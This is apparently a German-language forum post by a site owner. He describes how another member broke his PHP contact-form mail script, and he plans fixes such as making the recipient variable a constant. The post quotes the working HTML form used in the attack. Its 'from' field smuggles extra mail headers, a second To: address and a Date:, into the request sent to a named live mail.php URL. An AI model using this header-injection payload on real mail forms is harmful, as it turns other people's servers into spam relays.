So gerade wurde von einem netten Forumsteilnehmer mein Script geknackt mit diser
HTML Datei:
Code:
<
html>
<form ACTION="http://www.luckie-online.de/php/mail.php" METHOD=POST>
Ihre E-Mail Adresse:
<textarea NAME="from" COLS=60 ROWS=15>test@tester.de>
To: Tester <xyzabc@foob.ar>
Date: Sat, 22 Oct 2005 16:50:53 +0200
.
</textarea>
Ihr Name:
<input NAME="yourname" size=35>
Betreff:
<input NAME="subject" size=35>
Ihr Text:
<textarea NAME="text" COLS=60 ROWS=15>
diese mail solltest du gar nicht bekommen, sorry, falls es viele versuchen und du zu gespamt
wirst..., bei mir bleibt es bei diesem einen test!
versprochen...
Gruß Peter
</textarea>
<input TYPE="submit" VALUE="Senden">
</form>
</
html>
Die Mail ging sowohl an mich, als auch an den anderen Forumsteilnehmer, was ja eigentlich nicht sein sollte.
Den Tipp von Pr0gs habe ich noch nicht eingebaut, hätte der das verhindert? Alös erstes werde ich die Variable
$to zu einer Konstanten machen, damit man diese schon mal nicht überschreiben kann.
Puh, jetzt sieht man mal, wie schwer es ist solche Sachen wasserdicht zu bekommen, dabei ist das ja noch recht einfach und übersichtlich.
